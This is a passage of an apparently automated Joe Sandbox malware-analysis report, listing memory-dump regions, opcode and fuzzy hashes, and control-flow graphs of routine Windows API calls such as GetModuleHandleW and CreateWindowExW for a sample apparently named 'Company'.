                                                                                                                                  • Instruction Fuzzy Hash: 77910674E00258DFDB15CFAAD984A9DBBF2BF89304F1480AAD409EB365DB349985CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 81deff60e5642de8d632158ff71c308de68390f539ad2c3e6014f50330299c2e
                                                                                                                                  • Instruction ID: aef9b5370a38f1050cee1559c9b46a3c2f6d2ef12e270486ecea45e855841901
                                                                                                                                  • Opcode Fuzzy Hash: 81deff60e5642de8d632158ff71c308de68390f539ad2c3e6014f50330299c2e
                                                                                                                                  • Instruction Fuzzy Hash: 6E910474D00258CFEB20DFA8C848BEDBBB1FF49314F209669E409AB291DB759985CF14
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 05bbc6798e19f6ad32a778e302ad9fe07dbbd3fdf2942843dc2a5214df6e065a
                                                                                                                                  • Instruction ID: d2f6027e0c43603bbdf1fa7b63296568e96458786593e16a84bc270db317bd33
                                                                                                                                  • Opcode Fuzzy Hash: 05bbc6798e19f6ad32a778e302ad9fe07dbbd3fdf2942843dc2a5214df6e065a
                                                                                                                                  • Instruction Fuzzy Hash: 5D81C174E00218DFEF14DFAAD984A9DBBF2BF88304F149069D419AB365DB349982CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b60ef0501a9b51973e85df5aa853b8caa614dc9f476016595894e6628e416eea
                                                                                                                                  • Instruction ID: 86a3928a83bc752d64c286cdd43215ba1f6cc294a69f8d0f08236baf7650d4e1
                                                                                                                                  • Opcode Fuzzy Hash: b60ef0501a9b51973e85df5aa853b8caa614dc9f476016595894e6628e416eea
                                                                                                                                  • Instruction Fuzzy Hash: C0819074E00218DFEB14DFAAD984A9DBBF2BF88304F148069D419AB365DB35A981CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: a7eb117cce23b42a5fdc72e8263f282658eba708fa572907fe93bccadb8b6bdb
                                                                                                                                  • Instruction ID: b2f8d3224b1e656e60f6870c9651a4c5c61de5c383473345299c97a986b50f71
                                                                                                                                  • Opcode Fuzzy Hash: a7eb117cce23b42a5fdc72e8263f282658eba708fa572907fe93bccadb8b6bdb
                                                                                                                                  • Instruction Fuzzy Hash: 5281A074E00218DFEB14DFAAD984A9DBBF2BF88304F149069E409AB365DB349985CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 1a455d839f1f6d36b507daf4a05f42d9286a3c84bdf2f6c01edc833ffe8336ab
                                                                                                                                  • Instruction ID: c0937ede5483764303364cce48d185b5612dedfd21d979cec8088a8a71cc7fb5
                                                                                                                                  • Opcode Fuzzy Hash: 1a455d839f1f6d36b507daf4a05f42d9286a3c84bdf2f6c01edc833ffe8336ab
                                                                                                                                  • Instruction Fuzzy Hash: 6C81A174E00218DFEB54DFAAD984A9DBBF2BF88314F148069E409AB365DB349981CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 9101dbc76df788d5a32341a310b8f4ad68648e603470bebedb9dfeb7ae84f529
                                                                                                                                  • Instruction ID: b21565cf159031dc0855a26e9604ad9d97c7b6acb36034812203b0322d2ce0b9
                                                                                                                                  • Opcode Fuzzy Hash: 9101dbc76df788d5a32341a310b8f4ad68648e603470bebedb9dfeb7ae84f529
                                                                                                                                  • Instruction Fuzzy Hash: AE81B274E00218DFEF14DFAAD984A9DBBF2BF88314F149069D419AB365DB34A981CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c5a65f516fdd0375c8d3aaf4f2be5cebbdb1920917b3624a686554ccf5e66a30
                                                                                                                                  • Instruction ID: aef14d8532b7696dada2ab06769c60934de793cb7cec4790ee0683377f82b069
                                                                                                                                  • Opcode Fuzzy Hash: c5a65f516fdd0375c8d3aaf4f2be5cebbdb1920917b3624a686554ccf5e66a30
                                                                                                                                  • Instruction Fuzzy Hash: DD81B174E00218DFEB14DFAAD984A9DBBF2BF88314F14D06AD419AB365DB349981CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: b29dfc44d5a58829b6174e56bd681d887b640ceae5e1f397608e95800ac49811
                                                                                                                                  • Instruction ID: 92d538899d50c95f8a462a524fd56d18906ac023d50654ec9c5ade72e6c709a0
                                                                                                                                  • Opcode Fuzzy Hash: b29dfc44d5a58829b6174e56bd681d887b640ceae5e1f397608e95800ac49811
                                                                                                                                  • Instruction Fuzzy Hash: 9751C674E01209DFEB18DFAAD884A9DBBB2FF88300F24C069E915AB365DB355841CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: c04e02c5072e05c3b60a4e5b2d43b1445833e75201e87410fa7b906b7d13c631
                                                                                                                                  • Instruction ID: 8f800a1253d83a3d2bd47d4f98b7c8ecb7aa0d753fa04a524d840365cb02c2f3
                                                                                                                                  • Opcode Fuzzy Hash: c04e02c5072e05c3b60a4e5b2d43b1445833e75201e87410fa7b906b7d13c631
                                                                                                                                  • Instruction Fuzzy Hash: 7D51A674E01209DFEB18DFAAD584A9DBBB6FF88300F248029E919AB365DB345841CF54
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 8ecad52a6bdf27536abf713039821a08ce580daec543d68c8b9236981a8896a7
                                                                                                                                  • Instruction ID: 33fe266faa2b3baeeef34097b4ee888ab8be547e5d120a5108d7bbe95ab9bc7a
                                                                                                                                  • Opcode Fuzzy Hash: 8ecad52a6bdf27536abf713039821a08ce580daec543d68c8b9236981a8896a7
                                                                                                                                  • Instruction Fuzzy Hash: D2517274E01218DFDB58DFAAD98499DBBF2FF89310F248169E409AB364DB31A905CF50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1062 10a4c28-10a4c3f 1063 10a4c6b-10a4c6f 1062->1063 1064 10a4c41-10a4c4e call 10a4114 1062->1064 1065 10a4c83-10a4cc4 1063->1065 1066 10a4c71-10a4c7b 1063->1066 1071 10a4c50 1064->1071 1072 10a4c64 1064->1072 1073 10a4cd1-10a4cdf 1065->1073 1074 10a4cc6-10a4cce 1065->1074 1066->1065 1116 10a4c56 call 10a4ec8 1071->1116 1117 10a4c56 call 10a4ec0 1071->1117 1072->1063 1075 10a4d03-10a4d05 1073->1075 1076 10a4ce1-10a4ce6 1073->1076 1074->1073 1078 10a4d08-10a4d0f 1075->1078 1079 10a4ce8-10a4cef call 10a4120 1076->1079 1080 10a4cf1 1076->1080 1077 10a4c5c-10a4c5e 1077->1072 1081 10a4da0-10a4e60 1077->1081 1082 10a4d1c-10a4d23 1078->1082 1083 10a4d11-10a4d19 1078->1083 1085 10a4cf3-10a4d01 1079->1085 1080->1085 1111 10a4e68-10a4e93 GetModuleHandleW 1081->1111 1112 10a4e62-10a4e65 1081->1112 1086 10a4d30-10a4d39 1082->1086 1087 10a4d25-10a4d2d 1082->1087 1083->1082 1085->1078 1092 10a4d3b-10a4d43 1086->1092 1093 10a4d46-10a4d4b 1086->1093 1087->1086 1092->1093 1094 10a4d69-10a4d76 1093->1094 1095 10a4d4d-10a4d54 1093->1095 1101 10a4d78-10a4d96 1094->1101 1102 10a4d99-10a4d9f 1094->1102 1095->1094 1097 10a4d56-10a4d66 call 10a21e4 call 10a4130 1095->1097 1097->1094 1101->1102 1113 10a4e9c-10a4eb0 1111->1113 1114 10a4e95-10a4e9b 1111->1114 1112->1111 1114->1113 1116->1077 1117->1077
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 010A4E86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: f6f2414b0310f28c29ef1d79cb641d9401056b8af1ae42c39fba6cb6e777da29
                                                                                                                                  • Instruction ID: b66d2e3aaf7eb6197566e0340e32c48c57a66e1f8a07a5cc6d570fa55588615c
                                                                                                                                  • Opcode Fuzzy Hash: f6f2414b0310f28c29ef1d79cb641d9401056b8af1ae42c39fba6cb6e777da29
                                                                                                                                  • Instruction Fuzzy Hash: BD818774A00B058FE764DF6AD44079ABBF1FF88300F04896DD58ADBA50DBB5E845CB90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1118 10a6e04-10a6e76 1120 10a6e78-10a6e7e 1118->1120 1121 10a6e81-10a6e88 1118->1121 1120->1121 1122 10a6e8a-10a6e90 1121->1122 1123 10a6e93-10a6ecb 1121->1123 1122->1123 1124 10a6ed3-10a6f32 CreateWindowExW 1123->1124 1125 10a6f3b-10a6f73 1124->1125 1126 10a6f34-10a6f3a 1124->1126 1130 10a6f80 1125->1130 1131 10a6f75-10a6f78 1125->1131 1126->1125 1132 10a6f81 1130->1132 1131->1130 1132->1132
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010A6F22
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 132f08e8a45684fb3642254ba79f6dd9b47e87d04cccf8571c9ec1039d7904ea
                                                                                                                                  • Instruction ID: 5dd996ff12dcb886c99f44597030704e5387d1956158c35ef420c3b6f9ab23d3
                                                                                                                                  • Opcode Fuzzy Hash: 132f08e8a45684fb3642254ba79f6dd9b47e87d04cccf8571c9ec1039d7904ea
                                                                                                                                  • Instruction Fuzzy Hash: 5051CEB1D103499FDB14CFAAC880ADEBBF5FF48314F64852AE919AB210D7759881CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1133 10a42cc-10a6e76 1135 10a6e78-10a6e7e 1133->1135 1136 10a6e81-10a6e88 1133->1136 1135->1136 1137 10a6e8a-10a6e90 1136->1137 1138 10a6e93-10a6f32 CreateWindowExW 1136->1138 1137->1138 1140 10a6f3b-10a6f73 1138->1140 1141 10a6f34-10a6f3a 1138->1141 1145 10a6f80 1140->1145 1146 10a6f75-10a6f78 1140->1146 1141->1140 1147 10a6f81 1145->1147 1146->1145 1147->1147
                                                                                                                                  APIs
                                                                                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 010A6F22
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 716092398-0
                                                                                                                                  • Opcode ID: 17dcd3a4826122b0d2ab45023a76bb9a0337e475d2a9a31581a01954f46e7cdd
                                                                                                                                  • Instruction ID: 9f03f4c69bec20e30c54673ef1ad05e40f4629831f278598318515bec1e5de51
                                                                                                                                  • Opcode Fuzzy Hash: 17dcd3a4826122b0d2ab45023a76bb9a0337e475d2a9a31581a01954f46e7cdd
                                                                                                                                  • Instruction Fuzzy Hash: 7F51CEB1D003499FDB14CF9AC884ADEBBF6FF48310F64852AE919AB250D775A845CF90

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1148 10a441c-10a959c 1151 10a964c-10a966c call 10a42f4 1148->1151 1152 10a95a2-10a95a7 1148->1152 1159 10a966f-10a967c 1151->1159 1153 10a95fa-10a9632 CallWindowProcW 1152->1153 1154 10a95a9-10a95e0 1152->1154 1156 10a963b-10a964a 1153->1156 1157 10a9634-10a963a 1153->1157 1162 10a95e9-10a95f8 1154->1162 1163 10a95e2-10a95e8 1154->1163 1156->1159 1157->1156 1162->1159 1163->1162
                                                                                                                                  APIs
                                                                                                                                  • CallWindowProcW.USER32(?,?,?,?,?), ref: 010A9621
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CallProcWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2714655100-0
                                                                                                                                  • Opcode ID: 548e32ca6ff28599a2c784d7d9d00d9fc1881de42ad3459dd319d710c03af84a
                                                                                                                                  • Instruction ID: 8b4de2526941183c55d3e5d904b21cadd550702beec0e1d275c18aad70732de7
                                                                                                                                  • Opcode Fuzzy Hash: 548e32ca6ff28599a2c784d7d9d00d9fc1881de42ad3459dd319d710c03af84a
                                                                                                                                  • Instruction Fuzzy Hash: 46412CB4A00209CFDB14CF99C488AAEBBF5FF88314F24C459E559AB321D775A841CFA4

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1165 556992c 1166 55699eb-55699fc 1165->1166 1167 5569a03-5569a0c 1166->1167 1168 55699fe 1166->1168 1170 5569a12-5569a25 1167->1170 1171 55697e3-5569808 1167->1171 1168->1167 1174 5569a27 1170->1174 1175 5569a2c-5569a47 1170->1175 1172 556980f-5569846 1171->1172 1173 556980a 1171->1173 1183 556984d-556987f 1172->1183 1184 5569848 1172->1184 1173->1172 1174->1175 1176 5569a4e-5569a62 1175->1176 1177 5569a49 1175->1177 1181 5569a64 1176->1181 1182 5569a69-5569a7f LdrInitializeThunk 1176->1182 1177->1176 1181->1182 1185 5569a81-5569b7e 1182->1185 1190 55698e3-55698f6 1183->1190 1191 5569881-55698a6 1183->1191 1184->1183 1188 5569b86-5569b90 1185->1188 1189 5569b80-5569b85 1185->1189 1189->1188 1192 55698fd-5569922 1190->1192 1193 55698f8 1190->1193 1194 55698ad-55698db 1191->1194 1195 55698a8 1191->1195 1199 5569924-5569925 1192->1199 1200 5569931-5569969 1192->1200 1193->1192 1194->1190 1195->1194 1199->1170 1201 5569970-55699d1 call 5569328 1200->1201 1202 556996b 1200->1202 1208 55699d3 1201->1208 1209 55699d8-55699ea 1201->1209 1202->1201 1208->1209 1209->1166
                                                                                                                                  APIs
                                                                                                                                  • LdrInitializeThunk.NTDLL(00000000), ref: 05569A6E
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4654091580.0000000005560000.00000040.00000800.00020000.00000000.sdmp, Offset: 05560000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_5560000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2994545307-0
                                                                                                                                  • Opcode ID: 5db15eef3d75ef92b0636eb479c23520211af2690d7131f8168af32f88284bfa
                                                                                                                                  • Instruction ID: 72a03169fac21aee897fb9f68d89235a1b08743708b87c2ec399c848db28d911
                                                                                                                                  • Opcode Fuzzy Hash: 5db15eef3d75ef92b0636eb479c23520211af2690d7131f8168af32f88284bfa
                                                                                                                                  • Instruction Fuzzy Hash: C8116A78E042499FDB14DBE8D484EBDB7F5FF88314F148165E848E7255D7309941CB50

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1211 10a4e20-10a4e60 1212 10a4e68-10a4e93 GetModuleHandleW 1211->1212 1213 10a4e62-10a4e65 1211->1213 1214 10a4e9c-10a4eb0 1212->1214 1215 10a4e95-10a4e9b 1212->1215 1213->1212 1215->1214
                                                                                                                                  APIs
                                                                                                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 010A4E86
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HandleModule
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 4139908857-0
                                                                                                                                  • Opcode ID: 38478a2c394561039dc50bfc609851aa0bfbe81afb3097af3b1728eb1ebda99c
                                                                                                                                  • Instruction ID: 62d9387483cc5fc9fa48272f8db9e817509b15e5252a5327c6701c1eb77d480a
                                                                                                                                  • Opcode Fuzzy Hash: 38478a2c394561039dc50bfc609851aa0bfbe81afb3097af3b1728eb1ebda99c
                                                                                                                                  • Instruction Fuzzy Hash: B51110B6C003498FDB10DF9AD444ADEFBF4EB88324F14845AD969B7210C3B9A545CFA1

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1223 10aba91-10abafa OleInitialize 1224 10abafc-10abb02 1223->1224 1225 10abb03-10abb20 1223->1225 1224->1225
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 010ABAED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 69d7e133ffe16f2b1fc3a312fbf2ed4371498f89245b5fd7b2ce2cb7165648fe
                                                                                                                                  • Instruction ID: 42fc072e694382e4074d98579c7421e2f0ae7e47e42ca2cc552cb4338727f0b7
                                                                                                                                  • Opcode Fuzzy Hash: 69d7e133ffe16f2b1fc3a312fbf2ed4371498f89245b5fd7b2ce2cb7165648fe
                                                                                                                                  • Instruction Fuzzy Hash: 9A1133B1800349CFDB20DFA9D444BDEBFF4EB48324F24845AD559A7250C379A940CFA4

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 1217 10aac38-10abafa OleInitialize 1219 10abafc-10abb02 1217->1219 1220 10abb03-10abb20 1217->1220 1219->1220
                                                                                                                                  APIs
                                                                                                                                  • OleInitialize.OLE32(00000000), ref: 010ABAED
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4646270573.00000000010A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010A0000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_10a0000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Initialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2538663250-0
                                                                                                                                  • Opcode ID: 396dd1af8ea3e3a14d820fc88ab96842b59a1970ac33b911c15657cd0873d582
                                                                                                                                  • Instruction ID: a80ec6ea6e9461c7492b3a981f22d37e683dc97a3c354502f7bd1a257933f1e3
                                                                                                                                  • Opcode Fuzzy Hash: 396dd1af8ea3e3a14d820fc88ab96842b59a1970ac33b911c15657cd0873d582
                                                                                                                                  • Instruction Fuzzy Hash: E21115B1900349CFDB20DF9AD484BDEBBF4EB48324F20845AD559A7250D379A944CFA5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 47954c59c1ffcdb71a3f91aeeb92613415477d5b77542b53f7ec1ce3ccea74df
                                                                                                                                  • Instruction ID: fbb888384a90279e3ee843efd28bf1ada2b2d138d7e1bede89342b2a5f7277ed
                                                                                                                                  • Opcode Fuzzy Hash: 47954c59c1ffcdb71a3f91aeeb92613415477d5b77542b53f7ec1ce3ccea74df
                                                                                                                                  • Instruction Fuzzy Hash: 1B1296360252468FE2606F24E6AC53FBB66FB0F333716EC19F11A85569DF3115888B26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 64605ce603a73afe404a98beb7744d9636daa6b2a814e3089c3ce827d4a26212
                                                                                                                                  • Instruction ID: f5222f739ab76bb478f3ab24455762994483df2d0d8721b64b1f8b1d36cdf8cc
                                                                                                                                  • Opcode Fuzzy Hash: 64605ce603a73afe404a98beb7744d9636daa6b2a814e3089c3ce827d4a26212
                                                                                                                                  • Instruction Fuzzy Hash: 8C1286360652468FE2606F24E6AC53FBB66FB0F333716EC19F11A8156CDF3115888B26
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 6044a2a0da4e780d4a15cb9854aa63d8f4a67c8bec5e3c6a3e13243383e1fd30
                                                                                                                                  • Instruction ID: f8a75b1c8a3bc320c845c1efe446c11e76d63aa48d3079676981d8a4c9b52f00
                                                                                                                                  • Opcode Fuzzy Hash: 6044a2a0da4e780d4a15cb9854aa63d8f4a67c8bec5e3c6a3e13243383e1fd30
                                                                                                                                  • Instruction Fuzzy Hash: 2C520F7490021ADFCB64DF25EA84B9EBBB6FB48301F1081A9D909E7354DB356E91CF81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: d42346752243bd96b98230ce9c116ef69311b21f3ab419d693e2873e0a66fe4e
                                                                                                                                  • Instruction ID: 7678b6e7128cd27ec38372a1114731f62b3f904b480020d810f0358e395e34fb
                                                                                                                                  • Opcode Fuzzy Hash: d42346752243bd96b98230ce9c116ef69311b21f3ab419d693e2873e0a66fe4e
                                                                                                                                  • Instruction Fuzzy Hash: 3452FF7490021ADFCB64DF25EA84B9EBBB6FB48301F1081A9D909E7354DB356E91CF81
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 95dc444a0a09709a23b09bc90761573daa5f01bc2fadf7614be935b09005c32b
                                                                                                                                  • Instruction ID: 36f2fb95afc2d5a63c12615acae03425965588a16fe39158c601dac6ccb24533
                                                                                                                                  • Opcode Fuzzy Hash: 95dc444a0a09709a23b09bc90761573daa5f01bc2fadf7614be935b09005c32b
                                                                                                                                  • Instruction Fuzzy Hash: 58121530A10249DFDF25DF69D884AAEBBF2EF88318F148599E5499B2A1D730ED41CF50
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.4647106565.0000000001390000.00000040.00000800.00020000.00000000.sdmp, Offset: 01390000, based on PE: false
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_2_2_1390000__Company.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 597f927dc53cc11496e56d31c6315a992a654f4d73de184674045c29e5e1cf0b
                                                                                                                                  • Instruction ID: 594d4229bcbbde3918c22e536c1a88490751b1dc4c9087f78d95a829f825d434
                                                                                                                                  • Opcode Fuzzy Hash: 597f927dc53cc11496e56d31c6315a992a654f4d73de184674045c29e5e1cf0b
                                                                                                                                  • Instruction Fuzzy Hash: 4891CD70304205CFEB269F39C894B6F7BB6BF88214F148569E9468B396DB38CC46C791
                                                                                                                                  Memory Dump Source
